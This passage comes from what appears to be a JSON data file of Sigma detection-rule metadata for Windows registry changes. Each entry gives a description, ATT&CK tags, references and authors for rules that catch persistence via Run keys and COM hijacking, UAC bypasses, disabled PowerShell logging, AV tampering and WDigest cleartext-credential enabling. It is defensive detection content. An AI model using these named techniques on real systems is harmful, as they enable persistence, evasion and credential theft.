"https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry", + "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2022/03/17", + "filename": "registry_set_powershell_in_run_keys.yml", + "author": "frack113, Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate admin or third party scripts" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the modification of the registry of the currently logged in user to disable PowerShell module logging, script block logging or transcription and script execution logging", + "uuid": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", + "value": "PowerShell Logging Disabled", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ], + "creation_date": "2022/04/02", + "filename": "registry_set_powershell_logging_disabled.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a new custom protocole handler is registered", + "uuid": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", + "value": "Newly Registered Protocol Handler", + "meta": { + "refs": [ + 
"https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_register_custom_protocol_handler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/05/30", + "filename": "registry_set_register_custom_protocol_handler.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate applications registering a new custom protocol handler" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "uuid": "8023f872-3f1d-4301-a384-801889917ab4", + "value": "Usage of Renamed Sysinternals Tools - RegistrySet", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], + "creation_date": "2022/08/24", + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", + "uuid": "fe20dda1-6f37-4379-bbe0-a98d400cae90", + "value": "Scrobj.dll COM Hijacking", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scrobj_dll_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ], + "creation_date": 
"2022/08/20", + "filename": "registry_set_scrobj_dll_persistence.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use of the dll." + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", + "uuid": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", + "value": "ScreenSaver Registry Key Set", + "meta": { + "refs": [ + "https://twitter.com/VakninHai/status/1517027824984547329", + "https://twitter.com/pabraeken/status/998627081360695297", + "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2022/05/04", + "filename": "registry_set_scr_file_executed_by_rundll32.yml", + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "level": "medium", + "falsepositive": [ + "Legitimate use of screen saver" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. 
This is often used as a method of persistence.", + "uuid": "612e47e9-8a59-43a6-b404-f48683f45bd6", + "value": "ServiceDll Hijack", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time", + "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/02/04", + "filename": "registry_set_servicedll_hijack.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Administrative scripts", + "Installation of a service" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", + "uuid": "1c3121ed-041b-4d97-a075-07f54f20fb4a", + "value": "Registry Explorer Policy Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/03/18", + "filename": "registry_set_set_nopolicies_user.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate admin script" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility 
Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "uuid": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", + "value": "Registry Key Creation or Modification for Shim DataBase", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb", + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_shim_databases_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.011" + ], + "creation_date": "2021/12/30", + "filename": "registry_set_shim_databases_persistence.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process", + "uuid": "c81fe886-cac0-4913-a511-2822d72ff505", + "value": "SilentProcessExit Monitor Registration", + "meta": { + "refs": [ + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_silentprocessexit.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.012" + ], + "creation_date": "2021/02/26", + "filename": "registry_set_silentprocessexit.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + 
"description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "uuid": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", + "value": "Persistence Via New SIP Provider", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/codesigning.html", + "https://github.com/gtworek/PSBits/tree/master/SIP", + "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1553.003" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_sip_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate SIP being registered by the OS or different software." + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects tamper attempts to sophos av functionality via registry key modification", + "uuid": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", + "value": "Tamper With Sophos AV Registry Keys", + "meta": { + "refs": [ + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sophos_av_tamaper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/09/02", + "filename": "registry_set_sophos_av_tamaper.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Some FP may occure when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker set the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" 
to \"0\" in order to hide user account.", + "uuid": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "value": "Hide User Account Via Special Accounts Reg Key", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_special_accounts.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.002" + ], + "creation_date": "2022/07/12", + "filename": "registry_set_special_accounts.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", + "uuid": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "value": "Activate Suppression of Windows Security Center Notifications", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/08/19", + "filename": "registry_set_suppress_defender_notifications.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "uuid": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "value": "Suspicious Values In App Paths Default Property", + "meta": { + "refs": [ + "https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", + "https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.012" + ], + "creation_date": "2022/08/10", + "filename": "registry_set_susp_app_paths_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. 
Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", + "uuid": "34aa0252-6039-40ff-951f-939fd6ce47d8", + "value": "Suspicious Keyboard Layout Load", + "meta": { + "refs": [ + "https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index", + "https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], + "creation_date": "2019/10/12", + "filename": "registry_set_susp_keyboard_layout_load.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", + "uuid": "e0813366-0407-449a-9869-a2db1119dc41", + "value": "Suspicious Printer Driver Empty Manufacturer", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1410545674773467140", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" + ], + "creation_date": "2020/07/01", + "filename": "registry_set_susp_printer_driver.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "uuid": 
"b7916c2a-fa2f-4795-9477-32b731f70f11", + "value": "Registry Persistence via Explorer Run Key", + "meta": { + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2018/07/18", + "filename": "registry_set_susp_reg_persist_explorer_run.yml", + "author": "Florian Roth, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "uuid": "02ee49e2-e294-4d0f-9278-f5b3212fc588", + "value": "New RUN Key Pointing to Suspicious Folder", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2018/08/25", + "filename": "registry_set_susp_run_key_img_folder.yml", + "author": "Florian Roth, Markus Neis, Sander Wiebing", + "level": "high", + "falsepositive": [ + "Software using weird folders for updates" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", + "uuid": "f2485272-a156-4773-82d7-1d178bc4905b", + "value": "Suspicious Service Installed", + "meta": { + "refs": [ + 
"https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_service_installed.yml" + ], + "tags": [ + "attack.t1562.001", + "attack.defense_evasion" + ], + "creation_date": "2019/04/08", + "filename": "registry_set_susp_service_installed.yml", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "level": "medium", + "falsepositive": [ + "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "uuid": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "value": "Modify User Shell Folders Startup Value", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" + ], + "creation_date": "2022/10/01", + "filename": "registry_set_susp_user_shell_folders.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "uuid": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", + "value": "Scheduled TaskCache Change by Uncommon Program", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", 
+ "https://labs.f-secure.com/blog/scheduled-task-tampering/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.t1053.005" + ], + "creation_date": "2021/06/18", + "filename": "registry_set_taskcache_entry.yml", + "author": "Syed Hasan (@syedhasan009)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects persistence method using windows telemetry", + "uuid": "73a883d0-0348-4be4-a8d8-51031c2564f8", + "value": "Registry Persistence Mechanism via Windows Telemetry", + "meta": { + "refs": [ + "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005" + ], + "creation_date": "2020/10/16", + "filename": "registry_set_telemetry_persistence.yml", + "author": "Lednyov Alexey, oscd.community", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "uuid": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", + "value": "RDP Sensitive Settings Changed to Zero", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + 
"https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" + ], + "creation_date": "2022/09/29", + "filename": "registry_set_terminal_server_suspicious.yml", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "uuid": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "value": "RDP Sensitive Settings Changed", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + 
"http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" + ], + "creation_date": "2022/08/06", + "filename": "registry_set_terminal_server_tampering.yml", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "uuid": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "value": "Set TimeProviders DllName", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.003" + ], + "creation_date": "2022/06/19", + "filename": "registry_set_timeproviders_dllname.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect 
modification of TreatAs key to enable \"rundll32.exe -sta\" command", + "uuid": "dc5c24af-6995-49b2-86eb-a9ff62199e82", + "value": "COM Hijacking via TreatAs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", + "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ], + "creation_date": "2022/08/28", + "filename": "registry_set_treatas_persistence.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects UAC bypass method using Windows event viewer", + "uuid": "7c81fec3-1c1d-43b0-996a-46753041b1b6", + "value": "UAC Bypass via Event Viewer - Registry Set", + "meta": { + "refs": [ + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ], + "creation_date": "2017/03/19", + "filename": "registry_set_uac_bypass_eventvwr.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. 
UACMe 53)", + "uuid": "5b872a46-3b90-45c1-8419-f675db8053aa", + "value": "UAC Bypass via Sdclt", + "meta": { + "refs": [ + "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ], + "creation_date": "2017/03/17", + "filename": "registry_set_uac_bypass_sdclt.yml", + "author": "Omer Yampel, Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "uuid": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "value": "UAC Bypass Abusing Winsat Path Parsing - Registry", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "registry_set_uac_bypass_winsat.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "uuid": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "value": "UAC Bypass Using Windows Media Player - Registry", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + 
"attack.t1548.002" + ], + "creation_date": "2021/08/23", + "filename": "registry_set_uac_bypass_wmp.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "uuid": "46490193-1b22-4c29-bdd6-5bf63907216f", + "value": "VBScript Payload Stored in Registry", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2021/03/05", + "filename": "registry_set_vbs_payload_stored.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. 
Launched WAB.exe tries to load the DLL from Registry.", + "uuid": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "value": "Execution DLL of Choice Using WAB.EXE", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", + "https://twitter.com/Hexacorn/status/991447379864932352", + "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/13", + "filename": "registry_set_wab_dllpath_reg_change.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "uuid": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "value": "Wdigest Enable UseLogonCredential", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2019/09/12", + "filename": "registry_set_wdigest_enable_uselogoncredential.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + 
